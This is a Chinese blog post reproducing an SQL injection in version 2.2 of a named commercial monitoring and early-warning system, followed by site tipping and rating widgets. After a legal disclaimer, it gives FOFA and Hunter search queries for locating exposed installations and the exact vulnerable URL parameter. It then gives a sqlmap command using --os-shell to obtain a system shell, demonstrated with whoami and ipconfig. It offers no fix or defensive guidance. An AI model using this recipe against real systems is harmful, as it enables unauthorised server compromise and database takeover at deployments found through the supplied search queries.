某站点华测监测预警系统2.2版本-sql注入漏洞复现

写在文前:

本人严格遵守我国法律法规,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请诸君严格遵守法律要求.

本文简要讲述简单的渗透测试以及相关sql注入漏洞的复现测试,仅用作学习研究。

本文转载本人在去年年末于NNNU公众号发布的文章:X010TeamNNNU,欢迎大家关注!

本博客所分享内容仅用于网络安全技术讨论,切勿用于违法途径,

  1. 漏洞描述

    上海华测导航技术股份有限公司是一家专注于卫星导航领域的企业,公司成立于2001 年。作为国内唯一一家集北斗卫星应用产品研发、生产和销售为一体的单位,华测监测预警系统能够提供准确的监测结果和及时的预警信息,帮助用户避免设备故障、事故以及其他不良事件的发生,降低潜在风险和损失。通过渗透测试发现华测检测预警系统2.2版本存在sql注入漏洞。可通过该漏洞进行命令执行,写入shell,控制数据库等高危操作。

  2. 漏洞影响及资产收集

    (1)漏洞影响:华测监测预警系统2.2

    (2)FOFA语法app=”华测监测预警系统2.2”

    (3)Hunter语法web.body=”华测监测预警系统2.2”

  3. 漏洞位置

    /Web/SysManage/UserEdit.aspx?&ID=0

  4. 漏洞复现

  • 测试域名:XXXXXXXXXX.com

  • 测试URL:http://XXXXXXXXXX.com:7003

URL界面如下图1所示。

  • 将URL以及漏洞存在路径进行拼接得漏洞所在url

XXXXXXXXXXXXXXXXXX:7003/Web/SysManage/UserEdit.aspx?&ID=0

  • 将URL放入sqlmap:

Sqlmap -u "XXXXXXXXXXXXXX:7003/Web/SysManage/UserEdit.aspx?&ID=0" --os-shell –batch

如下图2所示。

尝试通过shell写入测试命令whoami,ipconfig,如下图3所示。

至此,测试完成。

  • 11
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Flyhha

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值